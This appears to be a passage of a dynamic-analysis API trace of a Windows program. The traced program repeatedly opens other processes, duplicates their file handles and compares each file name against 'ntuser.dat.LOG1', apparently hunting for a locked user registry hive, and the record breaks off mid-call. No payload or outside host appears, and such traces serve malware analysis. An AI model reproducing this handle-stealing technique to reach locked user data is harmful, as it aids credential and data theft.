_wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.055] CloseHandle (hObject=0x680) returned 1 [0152.055] CloseHandle (hObject=0x62c) returned 1 [0152.055] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.055] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xae4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.055] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.056] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.056] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.057] CloseHandle (hObject=0x670) returned 1 [0152.057] _wcsicmp (_Str1="\\FXSAPIDebugLogFile.txt", _Str2="\\ntuser.dat.LOG1") returned -8 [0152.057] CloseHandle (hObject=0x680) returned 1 [0152.057] CloseHandle (hObject=0x62c) returned 1 [0152.057] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.057] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xaf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.057] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.058] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.058] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.058] CloseHandle (hObject=0x670) returned 1 [0152.058] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.058] CloseHandle (hObject=0x680) returned 1 [0152.058] CloseHandle (hObject=0x62c) returned 1 [0152.058] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.058] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xccc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.059] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.060] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.060] CloseHandle (hObject=0x670) returned 1 [0152.060] _wcsicmp (_Str1="\\index.dat", _Str2="\\ntuser.dat.LOG1") returned -5 [0152.060] CloseHandle (hObject=0x680) returned 1 [0152.060] CloseHandle (hObject=0x62c) returned 1 [0152.060] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.060] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.060] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.061] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.061] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.061] CloseHandle (hObject=0x670) returned 1 [0152.062] _wcsicmp (_Str1="\\index.dat", _Str2="\\ntuser.dat.LOG1") returned -5 [0152.062] CloseHandle (hObject=0x680) returned 1 [0152.062] CloseHandle (hObject=0x62c) returned 1 [0152.062] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.062] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd3c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.062] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.062] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.063] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.063] CloseHandle (hObject=0x670) returned 1 [0152.063] _wcsicmp (_Str1="\\thumbcache_sr.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0152.063] CloseHandle (hObject=0x680) returned 1 [0152.063] CloseHandle (hObject=0x62c) returned 1 [0152.063] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.063] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd44, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.063] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.064] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.065] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.065] CloseHandle (hObject=0x670) returned 1 [0152.065] _wcsicmp (_Str1="\\thumbcache_1024.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0152.065] CloseHandle (hObject=0x680) returned 1 [0152.065] CloseHandle (hObject=0x62c) returned 1 [0152.065] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.065] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd54, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.065] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.066] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.068] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.068] CloseHandle (hObject=0x670) returned 1 [0152.068] _wcsicmp (_Str1="\\thumbcache_256.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0152.068] CloseHandle (hObject=0x680) returned 1 [0152.068] CloseHandle (hObject=0x62c) returned 1 [0152.068] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.068] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd60, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.068] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.069] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.070] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.070] CloseHandle (hObject=0x670) returned 1 [0152.070] _wcsicmp (_Str1="\\index.dat", _Str2="\\ntuser.dat.LOG1") returned -5 [0152.070] CloseHandle (hObject=0x680) returned 1 [0152.070] CloseHandle (hObject=0x62c) returned 1 [0152.070] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.070] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd6c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.070] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.071] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.071] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.072] CloseHandle (hObject=0x670) returned 1 [0152.072] _wcsicmp (_Str1="\\thumbcache_96.db", _Str2="\\ntuser.dat.LOG1") returned 6 [0152.072] CloseHandle (hObject=0x680) returned 1 [0152.072] CloseHandle (hObject=0x62c) returned 1 [0152.072] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.072] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xe74, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.072] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.072] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.073] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.073] CloseHandle (hObject=0x670) returned 1 [0152.073] _wcsicmp (_Str1="\\index.dat", _Str2="\\ntuser.dat.LOG1") returned -5 [0152.073] CloseHandle (hObject=0x680) returned 1 [0152.073] CloseHandle (hObject=0x62c) returned 1 [0152.073] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.073] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf9c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.073] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.074] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.074] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.075] CloseHandle (hObject=0x670) returned 1 [0152.075] _wcsicmp (_Str1="\\index.dat", _Str2="\\ntuser.dat.LOG1") returned -5 [0152.075] CloseHandle (hObject=0x680) returned 1 [0152.075] CloseHandle (hObject=0x62c) returned 1 [0152.075] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.075] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1294, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.075] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.076] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.076] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.076] CloseHandle (hObject=0x670) returned 1 [0152.076] _wcsicmp (_Str1="\\ActionCenter.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.076] CloseHandle (hObject=0x680) returned 1 [0152.076] CloseHandle (hObject=0x62c) returned 1 [0152.077] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.077] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x12d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.077] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.077] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.078] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.078] CloseHandle (hObject=0x670) returned 1 [0152.078] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\ntuser.dat.LOG1") returned -13 [0152.078] CloseHandle (hObject=0x680) returned 1 [0152.078] CloseHandle (hObject=0x62c) returned 1 [0152.078] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x62c [0152.078] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1308, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.078] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.079] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.080] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.080] CloseHandle (hObject=0x670) returned 1 [0152.080] CloseHandle (hObject=0x680) returned 1 [0152.080] CloseHandle (hObject=0x62c) returned 1 [0152.080] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0152.080] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.080] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.081] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.081] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.082] CloseHandle (hObject=0x670) returned 1 [0152.082] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.082] CloseHandle (hObject=0x680) returned 1 [0152.082] CloseHandle (hObject=0x62c) returned 1 [0152.082] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0152.082] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xd4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.082] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.082] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.083] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.083] CloseHandle (hObject=0x670) returned 1 [0152.084] CloseHandle (hObject=0x680) returned 1 [0152.084] CloseHandle (hObject=0x62c) returned 1 [0152.084] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0152.084] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.084] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.084] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.085] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.085] CloseHandle (hObject=0x670) returned 1 [0152.085] CloseHandle (hObject=0x680) returned 1 [0152.085] CloseHandle (hObject=0x62c) returned 1 [0152.085] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0152.085] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.085] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.086] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.087] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.087] CloseHandle (hObject=0x670) returned 1 [0152.087] CloseHandle (hObject=0x680) returned 1 [0152.087] CloseHandle (hObject=0x62c) returned 1 [0152.087] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x47c) returned 0x62c [0152.087] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.087] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.088] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.088] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.088] CloseHandle (hObject=0x670) returned 1 [0152.089] _wcsicmp (_Str1="\\KernelBase.dll.mui", _Str2="\\ntuser.dat.LOG1") returned -3 [0152.089] CloseHandle (hObject=0x680) returned 1 [0152.089] CloseHandle (hObject=0x62c) returned 1 [0152.089] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0152.089] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.089] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.089] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.090] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.090] CloseHandle (hObject=0x670) returned 1 [0152.090] _wcsicmp (_Str1="\\System32", _Str2="\\ntuser.dat.LOG1") returned 5 [0152.090] CloseHandle (hObject=0x680) returned 1 [0152.090] CloseHandle (hObject=0x62c) returned 1 [0152.090] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0152.090] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.090] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.091] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.092] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.092] CloseHandle (hObject=0x670) returned 1 [0152.092] CloseHandle (hObject=0x680) returned 1 [0152.092] CloseHandle (hObject=0x62c) returned 1 [0152.092] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0152.092] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.092] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.093] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.093] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.093] CloseHandle (hObject=0x670) returned 1 [0152.093] CloseHandle (hObject=0x680) returned 1 [0152.093] CloseHandle (hObject=0x62c) returned 1 [0152.093] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0152.093] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.094] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.095] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.095] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.095] CloseHandle (hObject=0x670) returned 1 [0152.095] CloseHandle (hObject=0x680) returned 1 [0152.095] CloseHandle (hObject=0x62c) returned 1 [0152.096] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0152.096] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.096] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.098] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.098] CloseHandle (hObject=0x670) returned 1 [0152.098] CloseHandle (hObject=0x680) returned 1 [0152.098] CloseHandle (hObject=0x62c) returned 1 [0152.098] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0152.098] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.098] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.099] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.100] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.100] CloseHandle (hObject=0x670) returned 1 [0152.100] CloseHandle (hObject=0x680) returned 1 [0152.100] CloseHandle (hObject=0x62c) returned 1 [0152.100] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0152.100] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.100] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.102] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.103] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.103] CloseHandle (hObject=0x670) returned 1 [0152.103] CloseHandle (hObject=0x680) returned 1 [0152.103] CloseHandle (hObject=0x62c) returned 1 [0152.103] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0152.103] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.103] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.104] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.104] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0152.104] CloseHandle (hObject=0x670) returned 1 [0152.104] CloseHandle (hObject=0x680) returned 1 [0152.104] CloseHandle (hObject=0x62c) returned 1 [0152.105] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x4bc) returned 0x62c [0152.105] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0152.105] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0152.105] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0152.106] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: 